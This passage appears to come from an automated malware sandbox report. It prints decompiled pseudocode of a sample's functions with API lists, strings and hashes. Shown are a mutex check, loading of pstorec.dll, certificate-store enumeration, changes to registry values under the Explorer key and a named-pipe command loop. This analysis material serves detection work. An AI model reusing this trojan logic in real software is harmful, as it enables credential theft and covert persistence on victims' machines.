						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 <= 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 <= 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 <= 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}






























    0x0040dff4
    0x0040dff8
    0x0040dffd
    0x0040dfff
    0x0040e002
    0x00000000
    0x0040e009
    0x0040e00b
    0x0040e01e
    0x0040e020
    0x0040e023
    0x0040e024
    0x0040e00d
    0x0040e00d
    0x0040e014
    0x0040e014
    0x0040e029
    0x0040e034
    0x0040e037
    0x0040e03a
    0x0040e03b
    0x0040e03b
    0x00000000
    0x0040e03b
    0x0040e040
    0x0040e047
    0x0040e049
    0x0040e057
    0x0040e05e
    0x0040e061
    0x0040e062
    0x0040e04b
    0x0040e04b
    0x0040e052
    0x0040e052
    0x0040e06b
    0x0040e070
    0x0040e07e
    0x0040e085
    0x0040e088
    0x0040e089
    0x0040e072
    0x0040e072
    0x0040e079
    0x0040e079
    0x0040e08c
    0x0040e090
    0x0040e096
    0x0040e098
    0x0040e0b7
    0x0040e0b7
    0x0040e0bc
    0x0040e0cd
    0x0040e0d2
    0x0040e0da
    0x0040e0db
    0x0040e0be
    0x0040e0be
    0x0040e0c8
    0x0040e0c8
    0x0040e0e0
    0x0040e0ee
    0x0040e0f5
    0x0040e0f8
    0x0040e0f9
    0x0040e0e2
    0x0040e0e2
    0x0040e0e9
    0x0040e0e9
    0x0040e0ff
    0x0040e102
    0x0040e107
    0x0040e109
    0x0040e110
    0x0040e112
    0x0040e125
    0x0040e127
    0x0040e12a
    0x0040e12b
    0x0040e114
    0x0040e114
    0x0040e11b
    0x0040e11b
    0x0040e134
    0x0040e139
    0x0040e147
    0x0040e14e
    0x0040e151
    0x0040e152
    0x0040e13b
    0x0040e13b
    0x0040e142
    0x0040e142
    0x0040e155
    0x0040e159
    0x0040e159
    0x0040e165
    0x0040e169
    0x0040e16c
    0x0040e174
    0x0040e179
    0x0040e17f
    0x0040e182
    0x0040e183
    0x0040e186
    0x0040e18e
    0x0040e191
    0x0040e192
    0x0040e195
    0x0040e195
    0x0040e195
    0x0040e19a
    0x00000000
    0x0040e19a
    0x0040e0a7
    0x0040e0a9
    0x0040e0ad
    0x0040e0b3
    0x0040e0b4
    0x00000000
    0x0040e0b4
    0x0040e1a2
    0x0040e1ad
    0x0040e1b4
    0x0040e1b4

    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction ID: 5cf0b869c3ece1dc4037ef0b1c63a914850ce8540bc613fc05f240a9535e6fc0
    • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
    • Instruction Fuzzy Hash: 87510132E00A359BDB148E99C4506ADF3B1EF85324F1A46BACD16BF3C1C675AD51CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040DD80, Relevance: .1, Instructions: 72COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040DD80() {
				signed int _t18;
				signed int _t38;
				signed int _t55;
				signed int _t56;
				signed int* _t59;
				signed int _t60;
				signed int* _t61;

				_t18 =  *0x413e58; // 0x1cc
				if(_t18 >= 0x270) {
					_t60 = 0;
					do {
						_t55 = _t60 << 2;
						_t1 = _t55 + 0x413494; // 0xaee6a520
						_t2 = 0x413490 + _t55; // 0x1e90d0c9
						_t3 = 0x413490 + _t55; // 0x1e90d0c9
						_t6 = _t55 + 0x413ac4; // 0x64e262b6
						_t60 = _t60 + 1;
						 *(0x413490 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x4124a0 + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
					} while (_t60 < 0xe3);
					if(_t60 < 0x26f) {
						_t59 =  &(0x413490[_t60]);
						do {
							_t10 =  &(_t59[1]); // 0x4
							_t61 = _t10;
							 *_t59 =  *(0x4124a0 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
							_t59 = _t61;
						} while (_t59 < 0x413e4c);
					}
					_t56 =  *0x413e4c; // 0xd5cb5150
					_t38 =  *0x413490; // 0x1e90d0c9
					 *0x413e4c = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x4124a0 + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x413ac0;
					_t18 = 0;
				}
				 *0x413e58 = _t18 + 1;
				return (0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b ^ ((0x413490[_t18] ^ 0x413490[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
			}










    0x0040dd80
    0x0040dd8a
    0x0040dd92
    0x0040dd99
    0x0040dd9b
    0x0040dd9e
    0x0040dda4
    0x0040ddac
    0x0040ddc0
    0x0040ddc6
    0x0040ddcd
    0x0040ddcd
    0x0040dddb
    0x0040dddd
    0x0040dde4
    0x0040dde6
    0x0040dde6
    0x0040de05
    0x0040de07
    0x0040de09
    0x0040dde4
    0x0040de11
    0x0040de17
    0x0040de38
    0x0040de3d
    0x0040de3d
    0x0040de47
    0x0040de72

    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: fe70b278222034761fc44da7ab056650558806c13e12973836ac921ab11914e6
    • Instruction ID: b0fb9c7d04ef6a132db29f26449a2553c388438f4a3a5cb84db962ef4e52fa9d
    • Opcode Fuzzy Hash: fe70b278222034761fc44da7ab056650558806c13e12973836ac921ab11914e6
    • Instruction Fuzzy Hash: 2A219F363205008BD748CF39DC5979633E2FB8C31D719857DD119CB290DA35E612CB48
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404E42, Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 181stringprocessencryptionCOMMON
    Download Yara Rule
    C-Code - Quality: 62%
    			E00404E42(void* __ecx) {
				intOrPtr _v1064;
				intOrPtr _v1084;
				void* _v1088;
				void* _v1096;
				short _v1588;
				void* _v1592;
				signed int _v1596;
				char _v1600;
				signed int _v1604;
				char _v1608;
				intOrPtr _v1612;
				int _t51;
				void* _t56;
				intOrPtr _t59;
				void* _t64;
				void* _t75;
				void* _t79;
				void* _t85;
				void* _t91;
				WCHAR* _t97;
				void* _t98;
				char* _t100;
				char* _t101;

				_t91 = __ecx;
				 *0x4126e8 = 0;
				E00409725(0);
				E00410678();
				L00403961();
				E004077B4();
				 *0x413e64 = 0;
				_v1600 = 1;
				lstrcpyW( &_v1588,  *0x4129e8);
				_t97 = L"rsldps";
				lstrcatW( &_v1588, _t97);
				_v1592 = CreateMutexW(0x413468, 1, _t97);
				if(GetLastError() == 0) {
					_t100 = "09ck_=ldfuihpfre";
					_t56 = E00407945(_t41, _t91, 1, _t100);
					_t109 = _t56 - 4;
					if(_t56 != 4) {
						E00404803();
						_push( &_v1600);
						_push(_t100);
						_push(1);
						_t85 = 4;
						E004079B5(_t85, _t109);
					}
					_t101 = "3709128dk0023444";
					_v1604 = 0;
					if(E00407945( &_v1604, _t91, 1, _t101) != 4) {
						_v1596 = 0;
					} else {
						_v1596 =  *_v1604;
					}
					_t59 = E00403DAD(_t91, 0, L"MY", 0, _v1596);
					_v1612 = _t59;
					_t111 = _t59 - _v1608;
					if(_t59 != _v1608) {
						_push( &_v1600);
						_push(_t101);
						_push(1);
						_t79 = 4;
						E004079B5(_t79, _t111);
					}
					E0040CF40(_v1604);
					_t102 = "!!!0-0=9-0=23434";
					_v1608 = 0;
					if(E00407945( &_v1608, _t91, 1, "!!!0-0=9-0=23434") != 0) {
						_t75 = E004075EF(_t91, _v1604, _t62);
						_t113 = _t75;
						if(_t75 != 0) {
							E00407A2C(_t113, 1, _t102);
						}
						E0040CF40(_v1604);
					}
					_t103 = "~23324m\'m434dKkl";
					_t64 = E00407945(0, _t91, 1, "~23324m\'m434dKkl");
					_t114 = _t64 - 4;
					if(_t64 == 4) {
						 *0x412b34(0x10000, 0, 0, E00403EFA);
						E00407A2C(_t114, 1, _t103);
					}
					_t104 = "3208()_*09303333";
					_v1604 = 0;
					if(E00407945( &_v1604, _t91, 1, "3208()_*09303333") == 4) {
						_t68 = _v1604;
						_t24 =  *_v1604 == 0;
						E00404BC8((_t68 & 0xffffff00 |  *_v1604 == 0x00000000) & 0x000000ff);
						E00407A2C(_t24, 1, _t104);
					}
					E0040CF40(_v1604);
				}
				if(_v1592 != 0) {
					CloseHandle(_v1592);
				}
				 *0x412e50 = 0;
				 *0x412e4c = 0;
				 *0x412dd0(0x412e34);
				 *0x412e10 = 0;
				 *0x412e0c = 0;
				 *0x412e14 = 0;
				 *0x412e18 = 0;
				 *0x412dd0(0x412e1c);
				 *0x412dd0(0x412708);
				 *0x412728 = 0;
				E0040541D();
				 *0x41272c = 0;
				 *0x412724 = 0;
				 *0x412dd0(0x4126ec);
				_v1084 = 0x428;
				_t98 = CreateToolhelp32Snapshot(8,  *0x412ba0);
				if(_t98 != 0xffffffff) {
					_t51 = Module32FirstW(_t98,  &_v1088);
					while(_t51 != 0) {
						E00406A74(0x412448, _t91, 0, _v1064);
						_t51 = Module32NextW(_t98,  &_v1096);
					}
				}
				return 1;
			}


























    0x00404e42
    0x00404e55
    0x00404e5b
    0x00404e60
    0x00404e65
    0x00404e6a
    0x00404e7d
    0x00404e83
    0x00404e87
    0x00404e8d
    0x00404e98
    0x00404eab
    0x00404eb7
    0x00404ebd
    0x00404ec4
    0x00404ec9
    0x00404ecc
    0x00404ece
    0x00404ed7
    0x00404ed8
    0x00404ed9
    0x00404edc
    0x00404edd
    0x00404edd
    0x00404ee2
    0x00404eed
    0x00404ef9
    0x00404f07
    0x00404efb
    0x00404f01
    0x00404f01
    0x00404f15
    0x00404f1a
    0x00404f1e
    0x00404f22
    0x00404f28
    0x00404f29
    0x00404f2a
    0x00404f2d
    0x00404f2e
    0x00404f2e
    0x00404f37
    0x00404f3c
    0x00404f47
    0x00404f52
    0x00404f59
    0x00404f5e
    0x00404f60
    0x00404f64
    0x00404f64
    0x00404f6d
    0x00404f6d
    0x00404f72
    0x00404f7b
    0x00404f80
    0x00404f83
    0x00404f91
    0x00404f99
    0x00404f99
    0x00404f9e
    0x00404fa9
    0x00404fb5
    0x00404fb7
    0x00404fbd
    0x00404fc4
    0x00404fcb
    0x00404fcb
    0x00404fd4
    0x00404fd4
    0x00404fdd
    0x00404fe3
    0x00404fe3
    0x00404fee
    0x00404ff4
    0x00404ffa
    0x00405005
    0x0040500b
    0x00405011
    0x00405017
    0x0040501d
    0x00405028
    0x0040502e
    0x00405034
    0x00405040
    0x00405046
    0x0040504c
    0x00405058
    0x0040506b
    0x00405070
    0x0040507b
    0x004050a3
    0x0040508f
    0x0040509d
    0x0040509d
    0x004050a3
    0x004050af

    APIs
      • Part of subcall function 00409725: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 00409858
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(?,0246F5A8,?), ref: 0041069F
      • Part of subcall function 00410678: PathCombineW.SHLWAPI(00413260,00413260,?), ref: 004106AE
    • lstrcpyW.KERNEL32(?), ref: 00404E87
    • lstrcatW.KERNEL32(?,rsldps), ref: 00404E98
    • CreateMutexW.KERNEL32(Function_00013468,00000001,rsldps), ref: 00404EA5
    • GetLastError.KERNEL32 ref: 00404EAF
    • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,00403EFA), ref: 00404F91
    • CloseHandle.KERNEL32(?), ref: 00404FE3
    • RtlInitializeCriticalSection.NTDLL(00412E34), ref: 00404FFA
    • RtlInitializeCriticalSection.NTDLL(00412E1C), ref: 0040501D
    • RtlInitializeCriticalSection.NTDLL(00412708), ref: 00405028
    • RtlInitializeCriticalSection.NTDLL(004126EC), ref: 0040504C
    • CreateToolhelp32Snapshot.KERNEL32(00000008), ref: 00405065
    • Module32FirstW.KERNEL32(00000000,?), ref: 0040507B
    • Module32NextW.KERNEL32(00000000,?), ref: 0040509D
      • Part of subcall function 00404803: LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00404819
      • Part of subcall function 00404803: GetProcAddress.KERNELBASE(00000000), ref: 00404820
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalInitializeSection$CombineCreateModule32Path$AddressBuffCertCharCloseEnumErrorFirstHandleLastLibraryLoadLowerMutexNextProcSnapshotStoreSystemToolhelp32lstrcatlstrcpy
    • String ID: !!!0-0=9-0=23434$09ck_=ldfuihpfre$3208()_*09303333$3709128dk0023444$rsldps$~23324m'm434dKkl
    • API String ID: 2000831771-3763064653
    • Opcode ID: 905d276a5dd3761ca79422ae862de307bd6c11e5db6e1ec7ca2835049f68851c
    • Instruction ID: 4273ece126efa07964b219cf53797b4160e737d776b16559c152c9fa35d47a19
    • Opcode Fuzzy Hash: 905d276a5dd3761ca79422ae862de307bd6c11e5db6e1ec7ca2835049f68851c
    • Instruction Fuzzy Hash: F651A1B0908301ABD310EF66DD4599F7AA8EF85355F00483BF544E21E1D7B899648BAE
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00407A73, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 266registryCOMMON
    Download Yara Rule
    C-Code - Quality: 93%
    			E00407A73() {
				void** _t94;
				signed int _t99;
				long _t113;
				long _t121;
				long _t130;
				short* _t136;
				int _t138;
				char* _t139;
				intOrPtr* _t143;
				void* _t145;
				void* _t156;
				int _t163;
				int _t167;
				void* _t170;
				void* _t172;

				_t170 = _t172 - 0x6c;
				_t156 =  *( *(_t170 + 0x7c));
				_t163 = 0;
				if(_t156 <= 0x10) {
					L47:
					return _t163;
				}
				 *(_t170 + 0x68) = 0;
				if((_t156 - 0x00000010 & 0xfffffffe) <= 0) {
					goto L47;
				} else {
					_t136 =  *( *(_t170 + 0x78));
					_t143 = _t136;
					while( *_t143 != _t163) {
						 *(_t170 + 0x68) =  *(_t170 + 0x68) + 1;
						_t143 = _t143 + 2;
						if( *(_t170 + 0x68) < _t156 - 0x10 >> 1) {
							continue;
						} else {
							L46:
							goto L47;
						}
					}
					_t145 = E0040D3D8(_t136) + _t80;
					_t150 = _t145 + _t136 + 2;
					 *(_t170 + 0x64) = _t145 + _t136 + 2 + 0x10;
					 *(_t170 + 0x60) = _t136 -  *(_t170 + 0x64) + _t156;
					if(_t156 - _t145 + 2 < 0x10) {
						goto L46;
					}
					E00407646(_t170 - 4, _t150);
					if( *_t136 != 0x2a ||  *((intOrPtr*)(_t136 + 2)) != 0) {
						E0040DE73(_t170 + 0x4c, _t136, E0040D3D8(_t136) + _t86);
						E00407646(_t170 - 0x54, _t170 + 0x4c);
						PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
						_t138 =  *(_t170 + 0x74);
						_t94 = _t170 + 0x68;
						if(_t138 != 0xf) {
							_t99 = RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, (0 | _t138 == 0x00000011) + 1, _t94);
						} else {
							_t99 = RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t94, 0);
						}
						asm("sbb esi, esi");
						_t163 =  ~_t99 + 1;
						if(_t163 == 0) {
							goto L46;
						} else {
							if(_t138 != 0xf) {
								if(_t138 != 0x11) {
									if(_t138 == 0x10) {
										_t163 = 0;
										if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, 0, _t170 + 0x74) == 0) {
											_t104 =  *(_t170 + 0x74);
											if( *(_t170 + 0x74) != 0) {
												_t139 = E0040CF2D(_t104);
												if(_t139 != 0) {
													if(RegQueryValueExW( *(_t170 + 0x68), _t170 - 4, 0, 0, _t139, _t170 + 0x74) != 0) {
														E0040CF40(_t139);
													} else {
														_t167 =  *(_t170 + 0x78);
														E0040CF40( *_t167);
														 *_t167 = _t139;
														_t163 =  *(_t170 + 0x74);
														 *( *(_t170 + 0x7c)) = _t163;
													}
												}
											}
										}
									}
									L44:
									_push( *(_t170 + 0x68));
									goto L45;
								}
								_t113 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
								L36:
								asm("sbb esi, esi");
								_t163 =  ~_t113 + 1;
								goto L44;
							}
							_t113 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
							goto L36;
						}
					} else {
						if(RegOpenKeyExW(0x80000001, L"software\\microsoft\\windows\\currentversion\\explorer", 0, 8, _t170 + 0x5c) != 0) {
							goto L46;
						} else {
							 *(_t170 + 0x78) = 0;
							while(1) {
								 *(_t170 + 0x7c) = 0x28;
								_t121 = RegEnumKeyExW( *(_t170 + 0x5c),  *(_t170 + 0x78), _t170 - 0x54, _t170 + 0x7c, 0, 0, 0, _t170 + 0x54);
								if(_t121 == 0xea) {
									goto L26;
								}
								if(_t121 != 0) {
									_push( *(_t170 + 0x5c));
									L45:
									RegCloseKey();
									goto L46;
								}
								if( *(_t170 + 0x7c) == 0x26 &&  *(_t170 - 0x54) == 0x7b &&  *((short*)(_t170 - 0xa)) == 0x7d) {
									PathCombineW(_t170 - 0x25c, L"software\\microsoft\\windows\\currentversion\\explorer", _t170 - 0x54);
									if( *(_t170 + 0x74) != 0x11) {
										if( *(_t170 + 0x74) != 0xf) {
											 *(_t170 + 0x68) = 0;
											L25:
											RegCloseKey( *(_t170 + 0x68));
											goto L26;
										}
										if(RegCreateKeyExW(0x80000001, _t170 - 0x25c, 0, 0, 0, 2, 0, _t170 + 0x68, 0) == 0) {
											_t130 = RegSetValueExW( *(_t170 + 0x68), _t170 - 4, 0, 3,  *(_t170 + 0x64),  *(_t170 + 0x60));
											L22:
											if(_t130 == 0) {
												_t163 = _t163 + 1;
											}
										}
										goto L25;
									}
									if(RegOpenKeyExW(0x80000001, _t170 - 0x25c, 0, 2, _t170 + 0x68) != 0) {
										goto L25;
									} else {
										_t130 = RegDeleteValueW( *(_t170 + 0x68), _t170 - 4);
										goto L22;
									}
								}
								L26:
								 *(_t170 + 0x78) =  *(_t170 + 0x78) + 1;
							}
						}
					}
				}
			}


















    0x00407a74
    0x00407a83
    0x00407a85
    0x00407a8a
    0x00407d56
    0x00407d5e
    0x00407d5e
    0x00407a93
    0x00407a9c
    0x00000000
    0x00407aa2
    0x00407aa6
    0x00407aa8
    0x00407aaa
    0x00407aaf
    0x00407aba
    0x00407abe
    0x00000000
    0x00407ac0
    0x00407d55
    0x00000000
    0x00407d55
    0x00407abe
    0x00407acc
    0x00407acf
    0x00407ad6
    0x00407ae4
    0x00407aea
    0x00000000
    0x00000000
    0x00407af3
    0x00407afe
    0x00407c35
    0x00407c40
    0x00407c55
    0x00407c5b
    0x00407c5e
    0x00407c64
    0x00407c9a
    0x00407c66
    0x00407c7a
    0x00407c7a
    0x00407ca4
    0x00407ca6
    0x00407ca9
    0x00000000
    0x00407caf
    0x00407cb2
    0x00407ccf
    0x00407cea
    0x00407cfa
    0x00407d04
    0x00407d06
    0x00407d0b
    0x00407d12
    0x00407d16
    0x00407d2e
    0x00407d47
    0x00407d30
    0x00407d30
    0x00407d35
    0x00407d3d
    0x00407d3f
    0x00407d42
    0x00407d42
    0x00407d2e
    0x00407d16
    0x00407d0b
    0x00407d04
    0x00407d4c
    0x00407d4c
    0x00000000
    0x00407d4c
    0x00407cd8
    0x00407cde
    0x00407ce2
    0x00407ce4
    0x00000000
    0x00407ce4
    0x00407cc4
    0x00000000
    0x00407cc4
    0x00407b0e
    0x00407b28
    0x00000000
    0x00407b2e
    0x00407b2e
    0x00407b31
    0x00407b43
    0x00407b4d
    0x00407b58
    0x00000000
    0x00000000
    0x00407b60
    0x00407c1e
    0x00407d4f
    0x00407d4f
    0x00000000
    0x00407d4f
    0x00407b6a
    0x00407b96
    0x00407ba0
    0x00407bce
    0x00407c0a
    0x00407c0d
    0x00407c10
    0x00000000
    0x00407c10
    0x00407beb
    0x00407bfd
    0x00407c03
    0x00407c05
    0x00407c07
    0x00407c07
    0x00407c05
    0x00000000
    0x00407beb
    0x00407bb9
    0x00000000
    0x00407bbb
    0x00407bc2
    0x00000000
    0x00407bc2
    0x00407bb9
    0x00407c16
    0x00407c16
    0x00407c16
    0x00407b31
    0x00407b28
    0x00407afe

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,software\microsoft\windows\currentversion\explorer,00000000,00000008,?), ref: 00407B20
    • RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,?), ref: 00407B4D
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?), ref: 00407B96
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000002,?), ref: 00407BB1
    • RegDeleteValueW.ADVAPI32(?,?), ref: 00407BC2
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 00407BE3
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?), ref: 00407BFD
      • Part of subcall function 0040DE73: CryptAcquireContextW.ADVAPI32(0040FCF8,00000000,00000000,00000001,F0000040,?,0040FCF8,00000000,?,-0000001C,00000000,?,?,?), ref: 0040DE8C
      • Part of subcall function 0040DE73: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 0040DEA4
      • Part of subcall function 0040DE73: CryptHashData.ADVAPI32(?,00000010), ref: 0040DEBF
      • Part of subcall function 0040DE73: CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 0040DED6
      • Part of subcall function 0040DE73: CryptDestroyHash.ADVAPI32(?), ref: 0040DEED
      • Part of subcall function 0040DE73: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040DEF7
    • RegCloseKey.ADVAPI32(?), ref: 00407C10
    • PathCombineW.SHLWAPI(?,software\microsoft\windows\currentversion\explorer,?,?,?,00000000), ref: 00407C55
    • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000002,00000000,?,00000000,?,00000000), ref: 00407C7A
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,00000000), ref: 00407C9A
    • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,?,?,00000000), ref: 00407CC4
    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00407CD8
      • Part of subcall function 0040CF40: HeapFree.KERNEL32(00000000,00000000,0040958E,00000000,00000001), ref: 0040CF53
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00407CFC
    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00407D26
    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00407D4F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CryptValue$Hash$CreateOpen$CloseCombineContextDeletePathQuery$AcquireDataDestroyEnumFreeHeapParamRelease
    • String ID: *$software\microsoft\windows\currentversion\explorer
    • API String ID: 1179558880-1506458415
    • Opcode ID: 99acb78b41caa17f00ed95c7cde797da357d0b7378249209d7018b839fdfa87c
    • Instruction ID: aa9b4c1d78fd442f01d3b3395a36ca9e650cd7f276a31cdce7d90ea6429e5710
    • Opcode Fuzzy Hash: 99acb78b41caa17f00ed95c7cde797da357d0b7378249209d7018b839fdfa87c
    • Instruction Fuzzy Hash: A6918E71904208AFEB20DF64CD84DEE7BB9EF85740B20413AF912E61A1D674AD45CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408F8D, Relevance: 25.6, APIs: 17, Instructions: 136filesynchronizationpipeCOMMON
    Download Yara Rule
    C-Code - Quality: 96%
    			E00408F8D(void _a4) {
				long _v8;
				void _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				void _t59;
				void* _t71;
				long _t75;
				void** _t81;

				_t81 = _a4;
				_v20 = CreateMutexW(0x413468, 0, _t81[4]);
				SetEvent(_t81[2]);
				DisconnectNamedPipe( *_t81);
				if(WaitForSingleObject(_t81[1], 0) != 0) {
					_t75 = 4;
					do {
						if(ConnectNamedPipe( *_t81, 0) == 1) {
							_v12 = 0;
							_v8 = 0;
							_v16 = 0;
							_a4 = 0;
							if(ReadFile( *_t81,  &_v12, _t75,  &_v8, 0) != 0 && _v8 == _t75 && ReadFile( *_t81,  &_a4, _t75,  &_v8, 0) != 0 && _v8 == _t75) {
								_t59 = _a4;
								if(_t59 > 0xa00000) {
									_t59 = 0;
									_a4 = 0;
								}
								if(_t59 <= 0) {
									L13:
									_v12 = _t81[3]( &_a4);
									WriteFile( *_t81,  &_v12, _t75,  &_v8, 0);
									if(_a4 > 0xa00000) {
										_a4 = 0;
									}
									WriteFile( *_t81,  &_a4, _t75,  &_v8, 0);
									if(_a4 != 0) {
										WriteFile( *_t81, _v16, _a4,  &_v8, 0);
									}
									FlushFileBuffers( *_t81);
								} else {
									_t71 = E0040CF2D(_t59);
									_v16 = _t71;
									if(_t71 != 0 && ReadFile( *_t81, _t71, _a4,  &_v8, 0) != 0 && _v8 == _a4) {
										goto L13;
									}
								}
							}
							E0040CF40(_v16);
							DisconnectNamedPipe( *_t81);
						}
					} while (WaitForSingleObject(_t81[1], 0) != 0);
				}
				CloseHandle(_v20);
				SetEvent(_t81[2]);
				_push(0);
				return RtlExitUserThread();
			}











    0x00408f94
    0x00408fac
    0x00408faf
    0x00408fb7
    0x00408fc9
    0x00408fd2
    0x00408fd3
    0x00408fdf
    0x00408ff1
    0x00408ff4
    0x00408ff7
    0x00408ffa
    0x00409005
    0x00409037
    0x0040903f
    0x00409041
    0x00409043
    0x00409043
    0x00409048
    0x00409073
    0x00409081
    0x0040908f
    0x0040909c
    0x0040909e
    0x0040909e
